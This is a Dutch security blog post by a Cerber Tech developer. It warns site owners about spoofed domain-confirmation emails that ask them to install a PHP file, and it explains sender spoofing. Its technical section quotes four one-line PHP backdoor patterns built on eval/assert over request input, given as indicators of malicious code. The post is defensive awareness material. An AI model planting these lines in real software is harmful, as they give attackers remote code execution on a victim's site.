Security Blog
Security Blog
Posted By Gregory

Vertrouw deze valse domeinbevestigings-e-mails niet

Als u ooit een brief ontvangt waarin wordt gevraagd om PHP-code op uw website te maken, downloaden of installeren, moet u deze negeren


English version: Do not trust those fake domain confirmation emails


Onlangs ontvingen enkele van mijn klanten vreemde e-mailbrieven van hun domeinregistreerders. Die brieven bevatten een verzoek om eigen domeinbevestiging. Ik controleerde een van die brieven en identificeerde het al snel als een frauduleuze brief . Alle letters hebben een identiek patroon en een verzoek om een PHP-bestand aan te maken in de hoofdmap van een website met een specifieke naam en de opgegeven inhoud. Het is onnodig om te zeggen dat de voorgestelde inhoud voor dat PHP-bestand kwaadaardige code bevat die bekend staat als achterdeurcode. Met dit soort code kan de aanvaller elke gewenste actie uitvoeren op de website van een slachtoffer.

Als u ooit een brief ontvangt waarin wordt gevraagd om PHP-code op uw website te maken, downloaden of installeren, moet u deze negeren. Geen uitzonderingen. Zelfs als de brief van de president of je moeder komt.

Frauduleuze brieven lijken legitiem vanwege het legitieme Van-e-mailadres . Maar het is e-mailspoofing. U verwacht niet dat u een nep-e-mail ontvangt van uw vrienden of uw domeinregistreerder. Rechts? Nee! Elke e-mailbrief kan elk Van-e-mailadres bevatten. De overgrote meerderheid van e-mailservers en e-mailclients controleren of verifiëren het afzenderadres niet. Je ziet het dus zoals een hacker het wilde. U mag geen e-mailbrief vertrouwen die u van een bekende afzender heeft ontvangen als de brief een verzoek bevat voor een verdachte actie, zoals het installeren van code op uw website of applicatie op uw computer.

Technische details

Valse e-mails bevatten meestal enkele van de volgende PHP-regels.

assert(stripslashes($_REQUEST['something']));

eval(stripslashes($_REQUEST['something']));

assert(base64_decode($_REQUEST['something']));

eval(base64_decode($_REQUEST['something']));

Ter informatie: base64_decode, eval en assert zijn bekende markers van verdachte of kwaadaardige PHP-code.

Zie ook: Plugin Inspector onthult beveiligingsproblemen met andere plug-ins


I'm a team lead in Cerber Tech. I'm a software & database architect, WordPress - PHP - SQL - JavaScript developer. I started coding in 1993 on IBM System/370 (yeah, that was amazing days) and today software engineering at Cerber Tech is how I make my living. I've taught to have high standards for myself as well as using them in developing software solutions.

View Comments
There are currently no comments.